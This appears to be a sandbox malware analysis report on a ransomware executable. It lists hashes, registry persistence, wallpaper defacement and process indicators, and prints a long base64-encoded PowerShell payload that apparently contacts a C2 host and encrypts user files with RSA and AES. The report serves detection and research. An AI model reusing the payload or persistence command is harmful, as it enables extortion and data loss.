e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b

General

Target

e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe
Size

45KB
MD5

0b08569ed102d22ba7c1c8f169f65009
SHA1

47ee1fa9d9d8cbe9b46bd1c235e1588b7ea53dc2
SHA256

e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b
SHA512

c5ab603dada3cb129da4f93483a8119e8bf50494c656669bed9ebf3a158f3132f9948cede40cbcb8cae000d32528ef3434680db92976eaf978e273dfce168dc1
SSDEEP

768:H9tDb7iaMIn7zAEleijtWpIS6ATY+W+ZEn3lFEhuc2cIMKKmxcBAsYcRA:H9tTX

Score

10^/10

persistence ransomware

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	988	1420	powershell.exe	31

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	988	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Windows\CurrentVersion\Run\a808258d-deb0-4fa2-b49f-29a3f80241c0 = "powershell.exe -command powershell.exe -windowstyle Minimized -enc $((Get-ItemProperty \"HKCU:\\Software\\a808258d-deb0-4fa2-b49f-29a3f80241c0\").Code)"	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpp.png"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpp.png"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpp.png"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpp.png"	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
912	powershell.exe
988	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeBackupPrivilege	1240	vssvc.exe
Token: SeRestorePrivilege	1240	vssvc.exe
Token: SeAuditPrivilege	1240	vssvc.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1136 wrote to memory of 912	1136	e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe	29
PID 1136 wrote to memory of 912	1136	e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe	29
PID 1136 wrote to memory of 912	1136	e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe	29
PID 988 wrote to memory of 964	988	powershell.exe	34
PID 988 wrote to memory of 964	988	powershell.exe	34
PID 988 wrote to memory of 964	988	powershell.exe	34

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe
"C:\Users\Admin\AppData\Local\Temp\e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABwAGwAIAA9ACAAIgBKAEEAQgB6AEEASABJAEEAZABnAEEAZwBBAEQAMABBAEkAQQBBAGkAQQBHAE0AQQBNAGcAQQB1AEEASABrAEEAWQBRAEIAeQBBAEgAUQBBAGQAQQBCAGsAQQBHADQAQQBMAGcAQgBrAEEARwBVAEEATwBnAEEAeABBAEQAVQBBAE0AdwBBAHoAQQBEAEkAQQBJAGcAQQBOAEEAQQBvAEEASgBBAEIAMABBAEcATQBBAEkAQQBBADkAQQBDAEEAQQBJAGcAQgBVAEEARwBVAEEAYwB3AEIAMABBAEUATQBBAFkAUQBCAHoAQQBHAFUAQQBJAEEAQgBVAEEARQBNAEEATQBBAEEAMABBAEMAOABBAE0AQQBBADEAQQBDAEkAQQBEAFEAQQBLAEEAQwBRAEEAUgBRAEIAeQBBAEgASQBBAGIAdwBCAHkAQQBFAEUAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEYAQQBBAGMAZwBCAGwAQQBHAFkAQQBaAFEAQgB5AEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAEkAQQBBADkAQQBDAEEAQQBJAGcAQgBUAEEARwBrAEEAYgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBRAHcAQgB2AEEARwA0AEEAZABBAEIAcABBAEcANABBAGQAUQBCAGwAQQBDAEkAQQBEAFEAQQBLAEEAQwBRAEEAYgBRAEIANQBBAEcAawBBAGMAQQBBAGcAQQBEADAAQQBJAEEAQQBvAEEARQBjAEEAWgBRAEIAMABBAEMAMABBAFQAZwBCAGwAQQBIAFEAQQBTAFEAQgBRAEEARQBNAEEAYgB3AEIAdQBBAEcAWQBBAGEAUQBCAG4AQQBIAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCADgAQQBDAEEAQQBWAHcAQgBvAEEARwBVAEEAYwBnAEIAbABBAEMAMABBAFQAdwBCAGkAQQBHAG8AQQBaAFEAQgBqAEEASABRAEEASQBBAEIANwBBAEEAMABBAEMAZwBBAGsAQQBGADgAQQBMAGcAQgBKAEEARgBBAEEAZABnAEEAMABBAEUAUQBBAFoAUQBCAG0AQQBHAEUAQQBkAFEAQgBzAEEASABRAEEAUgB3AEIAaABBAEgAUQBBAFoAUQBCADMAQQBHAEUAQQBlAFEAQQBnAEEAQwAwAEEAYgBnAEIAbABBAEMAQQBBAEoAQQBCAHUAQQBIAFUAQQBiAEEAQgBzAEEAQwBBAEEATABRAEIAaABBAEcANABBAFoAQQBBAGcAQQBDAFEAQQBYAHcAQQB1AEEARQA0AEEAWgBRAEIAMABBAEUARQBBAFoAQQBCAGgAQQBIAEEAQQBkAEEAQgBsAEEASABJAEEATABnAEIAVABBAEgAUQBBAFkAUQBCADAAQQBIAFUAQQBjAHcAQQBnAEEAQwAwAEEAYgBnAEIAbABBAEMAQQBBAEkAZwBCAEUAQQBHAGsAQQBjAHcAQgBqAEEARwA4AEEAYgBnAEIAdQBBAEcAVQBBAFkAdwBCADAAQQBHAFUAQQBaAEEAQQBpAEEAQQAwAEEAQwBnAEIAOQBBAEMAawBBAEwAZwBCAEoAQQBGAEEAQQBkAGcAQQAwAEEARQBFAEEAWgBBAEIAawBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBMAGcAQgBKAEEARgBBAEEAUQBRAEIAawBBAEcAUQBBAGMAZwBCAGwAQQBIAE0AQQBjAHcAQQBOAEEAQQBvAEEAWgBnAEIAMQBBAEcANABBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEAVABBAEIAdgBBAEcAYwBBAEkAQQBCADcAQQBBADAAQQBDAGcAQgB3AEEARwBFAEEAYwBnAEIAaABBAEcAMABBAEsAQQBBAGsAQQBHADAAQQBjAHcAQgBuAEEAQwBrAEEARABRAEEASwBBAEMAZwBBAGEAUQBCADMAQQBIAEkAQQBJAEEAQQB0AEEARgBVAEEAYwBnAEIAcABBAEMAQQBBAEkAZwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEMAUQBBAGMAdwBCAHkAQQBIAFkAQQBMAHcAQgBzAEEARwA4AEEAWgB3AEEAaQBBAEMAQQBBAEwAUQBCAEMAQQBHADgAQQBaAEEAQgA1AEEAQwBBAEEAUQBBAEIANwBBAEcAawBBAGMAQQBBADkAQQBDAFEAQQBiAFEAQgA1AEEARwBrAEEAYwBBAEEANwBBAEMAQQBBAGIAUQBCAGwAQQBIAE0AQQBjAHcAQgBoAEEARwBjAEEAWgBRAEEAOQBBAEMASQBBAEoAQQBCADAAQQBHAE0AQQBJAEEAQQBrAEEARwAwAEEAYwB3AEIAbgBBAEMASQBBAGYAUQBBAGcAQQBDADAAQQBWAFEAQgB6AEEARwBVAEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBGAEEAQQBZAFEAQgB5AEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEsAUQBBAGcAQQBIAHcAQQBJAEEAQgBQAEEASABVAEEAZABBAEEAdABBAEUANABBAGQAUQBCAHMAQQBHAHcAQQBJAEEAQQBOAEEAQQBvAEEAZgBRAEEATgBBAEEAbwBBAFQAQQBCAHYAQQBHAGMAQQBJAEEAQQBpAEEASABJAEEAZABRAEIAdQBBAEcANABBAGEAUQBCAHUAQQBHAGMAQQBJAGcAQQBOAEEAQQBvAEEASgBBAEIAdwBBAEgAVQBBAFkAZwBBAGcAQQBEADAAQQBJAEEAQQBuAEEARAB3AEEAVQBnAEIAVABBAEUARQBBAFMAdwBCAGwAQQBIAGsAQQBWAGcAQgBoAEEARwB3AEEAZABRAEIAbABBAEQANABBAFAAQQBCAE4AQQBHADgAQQBaAEEAQgAxAEEARwB3AEEAZABRAEIAegBBAEQANABBAGUAUQBBADQAQQBGAGsAQQBNAEEAQgBNAEEARwA4AEEAVABBAEEAdgBBAEQARQBBAEsAdwBCAEMAQQBFAHMAQQBWAFEAQgAyAEEASABjAEEAZABnAEIAMABBAEcAVQBBAGIAUQBCAHYAQQBGAFUAQQBUAHcAQQB5AEEARABJAEEAYQBnAEEANQBBAEYAVQBBAGUAQQBCAHQAQQBFADAAQQBSAHcAQgBwAEEARgBrAEEAWQBRAEIAMABBAEUANABBAGEAQQBCAGoAQQBFAFkAQQBiAHcAQQAyAEEARABJAEEATgBnAEIAUgBBAEUAdwBBAGEAUQBCADEAQQBHAFUAQQBlAGcAQgBKAEEARQBJAEEAWQBnAEIAaABBAEYAZwBBAFMAdwBCAFYAQQBHAGsAQQBVAEEAQgBIAEEARQA0AEEAWgBRAEIAMwBBAEUAawBBAFkAZwBCAEQAQQBEAEEAQQBkAEEAQQAwAEEARwAwAEEAWgBnAEIARgBBAEUASQBBAFoAQQBCAFIAQQBDAHMAQQBjAEEAQgAzAEEARwBVAEEAYwBRAEEAMABBAEYATQBBAFQAQQBCAEoAQQBIAEkAQQBTAEEAQgBaAEEASABZAEEAVQBnAEEAMgBBAEcATQBBAFUAQQBBAHoAQQBIAFkAQQBTAHcAQgBMAEEARQBVAEEARABRAEEASwBBAEYAbwBBAE0AQQBCAHcAQQBGAEUAQQBLAHcAQgBHAEEARgBFAEEATQBBAEIAMQBBAEQAUQBBAFMAUQBCAHoAQQBGAEkAQQBVAGcAQgBoAEEARABNAEEAYgB3AEIAcABBAEgAZwBBAFUAQQBBADAAQQBFADQAQQBUAGcAQgBxAEEARwA4AEEAUQB3AEIAMQBBAEQAVQBBAGQAUQBCAG4AQQBGAGcAQQBVAGcAQgAwAEEARwBVAEEAUgBnAEIAbgBBAEcAUQBBAGUAQQBCAE8AQQBFADAAQQBWAFEAQgBWAEEASABvAEEASwB3AEEAMgBBAEUAMABBAGUAZwBCAGsAQQBFAEkAQQBWAHcAQQA1AEEASABnAEEAYQBBAEEANABBAEQATQBBAFoAUQBBADMAQQBHAGsAQQBjAFEAQgBYAEEASABBAEEAWgBRAEIAbQBBAEcAcwBBAFMAdwBCAGkAQQBEAEEAQQBNAGcAQgByAEEARgBBAEEAVwBnAEIAdwBBAEcAZwBBAEsAdwBCAFYAQQBEADAAQQBQAEEAQQB2AEEARQAwAEEAYgB3AEIAawBBAEgAVQBBAGIAQQBCADEAQQBIAE0AQQBQAGcAQQA4AEEARQBVAEEAZQBBAEIAdwBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBkAEEAQQArAEEARQBFAEEAVQBRAEIAQgBBAEUASQBBAFAAQQBBAHYAQQBFAFUAQQBlAEEAQgB3AEEARwA4AEEAYgBnAEIAbABBAEcANABBAGQAQQBBACsAQQBEAHcAQQBMAHcAQgBTAEEARgBNAEEAUQBRAEIATABBAEcAVQBBAGUAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEAUABnAEEAbgBBAEEAMABBAEMAZwBBAGsAQQBGAEkAQQBVAHcAQgBCAEEAQwBBAEEAUABRAEEAZwBBAEUANABBAFoAUQBCADMAQQBDADAAQQBUAHcAQgBpAEEARwBvAEEAWgBRAEIAagBBAEgAUQBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYATQBBAFoAUQBCAGoAQQBIAFUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEUATQBBAGMAZwBCADUAQQBIAEEAQQBkAEEAQgB2AEEARwBjAEEAYwBnAEIAaABBAEgAQQBBAGEAQQBCADUAQQBDADQAQQBVAGcAQgBUAEEARQBFAEEAUQB3AEIAeQBBAEgAawBBAGMAQQBCADAAQQBHADgAQQBVAHcAQgBsAEEASABJAEEAZABnAEIAcABBAEcATQBBAFoAUQBCAFEAQQBIAEkAQQBiAHcAQgAyAEEARwBrAEEAWgBBAEIAbABBAEgASQBBAEQAUQBBAEsAQQBDAFEAQQBVAGcAQgBUAEEARQBFAEEATABnAEIARwBBAEgASQBBAGIAdwBCAHQAQQBGAGcAQQBiAFEAQgBzAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBDAGcAQQBKAEEAQgB3AEEASABVAEEAWQBnAEEAcABBAEEAMABBAEMAZwBBAGsAQQBHAGMAQQBiAEEAQgB2AEEARwBJAEEAWQBRAEIAcwBBAEQAbwBBAFkAdwBBAGcAQQBEADAAQQBJAEEAQQB3AEEAQQAwAEEAQwBnAEIAbQBBAEgAVQBBAGIAZwBCAGoAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEASQBBAEIARgBBAEcANABBAFkAdwBBAGcAQQBIAHMAQQBEAFEAQQBLAEEASABBAEEAWQBRAEIAeQBBAEcARQBBAGIAUQBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABBAEEASQBBAEEAcABBAEEAMABBAEMAZwBCADAAQQBIAEkAQQBlAFEAQQBnAEEASABzAEEARABRAEEASwBBAEMAUQBBAGEAdwBCAGwAQQBIAGsAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEgAawBBAGMAdwBCADAAQQBHAFUAQQBiAFEAQQB1AEEARQBFAEEAYwBnAEIAeQBBAEcARQBBAGUAUQBCAGQAQQBEAG8AQQBPAGcAQgBEAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBnAEIAagBBAEcAVQBBAEsAQQBCAGIAQQBHAEkAQQBlAFEAQgAwAEEARwBVAEEAWABRAEEAcwBBAEQATQBBAE0AZwBBAHAAQQBBADAAQQBDAGcAQQBvAEEARQA0AEEAWgBRAEIAMwBBAEMAMABBAFQAdwBCAGkAQQBHAG8AQQBaAFEAQgBqAEEASABRAEEASQBBAEEAdABBAEYAUQBBAGUAUQBCAHcAQQBHAFUAQQBUAGcAQgBoAEEARwAwAEEAWgBRAEEAZwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwA0AEEAVQBnAEIAaABBAEcANABBAFoAQQBCAHYAQQBHADAAQQBLAFEAQQB1AEEARQA0AEEAWgBRAEIANABBAEgAUQBBAFEAZwBCADUAQQBIAFEAQQBaAFEAQgB6AEEAQwBnAEEASgBBAEIAcgBBAEcAVQBBAGUAUQBBAHAAQQBBADAAQQBDAGcAQQBrAEEARwBzAEEAWgBRAEIANQBBAEYAOABBAFoAUQBCAHUAQQBHAE0AQQBJAEEAQQA5AEEAQwBBAEEASgBBAEIAUwBBAEYATQBBAFEAUQBBAHUAQQBFAFUAQQBiAGcAQgBqAEEASABJAEEAZQBRAEIAdwBBAEgAUQBBAEsAQQBBAGsAQQBHAHMAQQBaAFEAQgA1AEEAQwB3AEEASgBBAEIAMABBAEgASQBBAGQAUQBCAGwAQQBDAGsAQQBEAFEAQQBLAEEAQwBRAEEAUQBRAEEAZwBBAEQAMABBAEkAQQBCAE8AQQBHAFUAQQBkAHcAQQB0AEEARQA4AEEAWQBnAEIAcQBBAEcAVQBBAFkAdwBCADAAQQBDAEEAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAEwAZwBCAFQAQQBHAFUAQQBZAHcAQgAxAEEASABJAEEAYQBRAEIAMABBAEgAawBBAEwAZwBCAEQAQQBIAEkAQQBlAFEAQgB3AEEASABRAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHcAQQBHAGcAQQBlAFEAQQB1AEEARQBFAEEAWgBRAEIAegBBAEUAMABBAFkAUQBCAHUAQQBHAEUAQQBaAHcAQgBsAEEARwBRAEEARABRAEEASwBBAEMAUQBBAFEAUQBBAHUAQQBFADAAQQBiAHcAQgBrAEEARwBVAEEASQBBAEEAOQBBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYATQBBAFoAUQBCAGoAQQBIAFUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEUATQBBAGMAZwBCADUAQQBIAEEAQQBkAEEAQgB2AEEARwBjAEEAYwBnAEIAaABBAEgAQQBBAGEAQQBCADUAQQBDADQAQQBRAHcAQgBwAEEASABBAEEAYQBBAEIAbABBAEgASQBBAFQAUQBCAHYAQQBHAFEAQQBaAFEAQgBkAEEARABvAEEATwBnAEIARABBAEUASQBBAFEAdwBBAE4AQQBBAG8AQQBKAEEAQgBCAEEAQwA0AEEAVQBBAEIAaABBAEcAUQBBAFoAQQBCAHAAQQBHADQAQQBaAHcAQQBnAEEARAAwAEEASQBBAEIAYgBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwA0AEEAVQB3AEIAbABBAEcATQBBAGQAUQBCAHkAQQBHAGsAQQBkAEEAQgA1AEEAQwA0AEEAUQB3AEIAeQBBAEgAawBBAGMAQQBCADAAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYwBBAEIAbwBBAEgAawBBAEwAZwBCAFEAQQBHAEUAQQBaAEEAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEUAMABBAGIAdwBCAGsAQQBHAFUAQQBYAFEAQQA2AEEARABvAEEAVQBBAEIATABBAEUATQBBAFUAdwBBADMAQQBBADAAQQBDAGcAQQBrAEEARQBFAEEATABnAEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBVAHcAQgBwAEEASABvAEEAWgBRAEEAZwBBAEQAMABBAEkAQQBBAHgAQQBEAEkAQQBPAEEAQQBOAEEAQQBvAEEASgBBAEIAQgBBAEMANABBAFMAdwBCAGwAQQBIAGsAQQBVAHcAQgBwAEEASABvAEEAWgBRAEEAZwBBAEQAMABBAEkAQQBBAHkAQQBEAFUAQQBOAGcAQQBOAEEAQQBvAEEASgBBAEIAQgBBAEMANABBAFMAdwBCAGwAQQBIAGsAQQBJAEEAQQA5AEEAQwBBAEEASgBBAEIAcgBBAEcAVQBBAGUAUQBBAE4AQQBBAG8AQQBKAEEAQgBCAEEAQwA0AEEAUwBRAEIAVwBBAEMAQQBBAFAAUQBBAGcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQgBpAEEASABrAEEAZABBAEIAbABBAEYAcwBBAFgAUQBBAGcAQQBEAEUAQQBOAGcAQQBOAEEAQQBvAEEASgBBAEIAaQBBAEMAQQBBAFAAUQBBAGcAQQBGAHMAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAEwAZwBCAEoAQQBFADgAQQBMAGcAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAMABBAE8AZwBBADYAQQBGAEkAQQBaAFEAQgBoAEEARwBRAEEAUQBRAEIAcwBBAEcAdwBBAFEAZwBCADUAQQBIAFEAQQBaAFEAQgB6AEEAQwBnAEEASgBBAEIAdwBBAEMAawBBAEQAUQBBAEsAQQBDAFEAQQBaAFEAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAcwBBAFoAUQBCADUAQQBGADgAQQBaAFEAQgB1AEEARwBNAEEASQBBAEEAcgBBAEMAQQBBAEsAQQBBAGsAQQBFAEUAQQBMAGcAQgBEAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBCAEYAQQBHADQAQQBZAHcAQgB5AEEASABrAEEAYwBBAEIAMABBAEcAOABBAGMAZwBBAG8AQQBDAGsAQQBLAFEAQQB1AEEARgBRAEEAYwBnAEIAaABBAEcANABBAGMAdwBCAG0AQQBHADgAQQBjAGcAQgB0AEEARQBZAEEAYQBRAEIAdQBBAEcARQBBAGIAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEASwBBAEEAawBBAEcASQBBAEwAQQBBAGcAQQBEAEEAQQBMAEEAQQBnAEEAQwBRAEEAWQBnAEEAdQBBAEUAdwBBAFoAUQBCAHUAQQBHAGMAQQBkAEEAQgBvAEEAQwBrAEEARABRAEEASwBBAEYAcwBBAFUAdwBCADUAQQBIAE0AQQBkAEEAQgBsAEEARwAwAEEATABnAEIASgBBAEUAOABBAEwAZwBCAEcAQQBHAGsAQQBiAEEAQgBsAEEARgAwAEEATwBnAEEANgBBAEYAYwBBAGMAZwBCAHAAQQBIAFEAQQBaAFEAQgBCAEEARwB3AEEAYgBBAEIAQwBBAEgAawBBAGQAQQBCAGwAQQBIAE0AQQBLAEEAQQBrAEEASABBAEEATABBAEEAZwBBAEMAUQBBAFoAUQBBAHAAQQBBADAAQQBDAGcAQgBTAEEARwBVAEEAYgBnAEIAaABBAEcAMABBAFoAUQBBAHQAQQBFAGsAQQBkAEEAQgBsAEEARwAwAEEASQBBAEEAdABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBrAEEASABBAEEASQBBAEEAdABBAEUANABBAFoAUQBCADMAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAaQBBAEMAUQBBAGMAQQBBAHUAQQBHAE0AQQBjAGcAQgB3AEEASABRAEEASQBnAEEATgBBAEEAbwBBAEoAQQBCAG4AQQBHAHcAQQBiAHcAQgBpAEEARwBFAEEAYgBBAEEANgBBAEcATQBBAEsAdwBBAHIAQQBBADAAQQBDAGcAQgA5AEEAQwBBAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBDAEEAQQBlAHcAQQBOAEEAQQBvAEEAVgB3AEIAeQBBAEcAawBBAGQAQQBCAGwAQQBDADAAQQBTAEEAQgB2AEEASABNAEEAZABBAEEAZwBBAEMAUQBBAFgAdwBBAHUAQQBFAFUAQQBlAEEAQgBqAEEARwBVAEEAYwBBAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADQAQQBUAFEAQgBsAEEASABNAEEAYwB3AEIAaABBAEcAYwBBAFoAUQBBAE4AQQBBAG8AQQBmAFEAQQBOAEEAQQBvAEEAZgBRAEEATgBBAEEAbwBBAEoAQQBCAG0AQQBHAGsAQQBiAEEAQgBsAEEASABNAEEASQBBAEEAOQBBAEMAQQBBAFIAdwBCAGwAQQBIAFEAQQBMAFEAQgBEAEEARwBrAEEAYgBRAEIASgBBAEcANABBAGMAdwBCADAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEASQBBAEEAdABBAEYARQBBAGQAUQBCAGwAQQBIAEkAQQBlAFEAQQBnAEEAQwBJAEEAVQB3AEIARgBBAEUAdwBBAFIAUQBCAEQAQQBGAFEAQQBJAEEAQQBxAEEAQwBBAEEAUgBnAEIAUwBBAEUAOABBAFQAUQBBAGcAQQBFAE0AQQBTAFEAQgBOAEEARgA4AEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEAQwBBAEEAVgB3AEIASQBBAEUAVQBBAFUAZwBCAEYAQQBDAEEAQQBUAGcAQgBQAEEARgBRAEEASQBBAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBUAEEAQgBKAEEARQBzAEEAUgBRAEEAZwBBAEMAYwBBAFkAdwBBADYAQQBGAHcAQQBYAEEAQgAzAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAHoAQQBGAHcAQQBYAEEAQQBsAEEAQwBjAEEASQBBAEIAQgBBAEUANABBAFIAQQBBAE4AQQBBAG8AQQBLAEEAQgBGAEEASABnAEEAZABBAEIAbABBAEcANABBAGMAdwBCAHAAQQBHADgAQQBiAGcAQQA5AEEAQwBjAEEAYwBBAEIAawBBAEcAWQBBAEoAdwBBAGcAQQBHADgAQQBjAGcAQQBnAEEARQBVAEEAZQBBAEIAMABBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARAAwAEEASgB3AEIAawBBAEcAOABBAFkAdwBCADQAQQBDAGMAQQBJAEEAQgB2AEEASABJAEEASQBBAEIARgBBAEgAZwBBAGQAQQBCAGwAQQBHADQAQQBjAHcAQgBwAEEARwA4AEEAYgBnAEEAOQBBAEMAYwBBAFoAQQBCAHYAQQBHAE0AQQBKAHcAQQBnAEEARwA4AEEAYwBnAEEAZwBBAEUAVQBBAGUAQQBCADAAQQBHAFUAQQBiAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEQAMABBAEoAdwBCADQAQQBHAHcAQQBjAHcAQgA0AEEAQwBjAEEASQBBAEIAdgBBAEgASQBBAEkAQQBCAEYAQQBIAGcAQQBkAEEAQgBsAEEARwA0AEEAYwB3AEIAcABBAEcAOABBAGIAZwBBADkAQQBDAGMAQQBlAEEAQgBzAEEASABNAEEASgB3AEEAZwBBAEcAOABBAGMAZwBBAGcAQQBFAFUAQQBlAEEAQgAwAEEARwBVAEEAYgBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBEADAAQQBKAHcAQgBxAEEASABBAEEAWgB3AEEAbgBBAEMAQQBBAGIAdwBCAHkAQQBDAEEAQQBSAFEAQgA0AEEASABRAEEAWgBRAEIAdQBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBQAFEAQQBuAEEARwBvAEEAYwBBAEIAbABBAEcAYwBBAEoAdwBBAGcAQQBHADgAQQBjAGcAQQBnAEEARQBVAEEAZQBBAEIAMABBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARAAwAEEASgB3AEIAdwBBAEcANABBAFoAdwBBAG4AQQBDAGsAQQBJAGcAQQBOAEEAQQBvAEEAVABBAEIAdgBBAEcAYwBBAEkAQQBBAGkAQQBHAFkAQQBiAHcAQgAxAEEARwA0AEEAWgBBAEEAZwBBAEMAUQBBAEsAQQBBAGsAQQBHAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEEAdQBBAEUAdwBBAFoAUQBCAHUAQQBHAGMAQQBkAEEAQgBvAEEAQwBrAEEASQBBAEIAbQBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBJAEEAQgAwAEEARwA4AEEASQBBAEIAdwBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBJAEEARABRAEEASwBBAEMAUQBBAFoAZwBCAHAAQQBHAHcAQQBaAFEAQgB6AEEAQwBBAEEAZgBBAEEAZwBBAEMAVQBBAEkAQQBCADcAQQBDAEEAQQBSAFEAQgB1AEEARwBNAEEASwBBAEEAawBBAEYAOABBAEwAZwBCAE8AQQBHAEUAQQBiAFEAQgBsAEEAQwBrAEEASQBBAEIAOQBBAEEAMABBAEMAZwBCAE0AQQBHADgAQQBaAHcAQQBnAEEAQwBJAEEAYwBBAEIAeQBBAEcAOABBAFkAdwBCAGwAQQBIAE0AQQBjAHcAQgBsAEEARwBRAEEASQBBAEEAawBBAEcAYwBBAGIAQQBCAHYAQQBHAEkAQQBZAFEAQgBzAEEARABvAEEAWQB3AEEAZwBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBjAHcAQQBpAEEAQQAwAEEAQwBnAEEAawBBAEcAUQBBAGEAUQBCAHkAQQBIAE0AQQBJAEEAQQA5AEEAQwBBAEEAUQBBAEIANwBBAEgAMABBAEQAUQBBAEsAQQBDAFEAQQBaAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEMAQQBBAGYAQQBBAGcAQQBDAFUAQQBJAEEAQgA3AEEAQwBBAEEASgBBAEIAawBBAEcAawBBAGMAZwBCAHoAQQBGAHMAQQBLAEEAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEwAUQ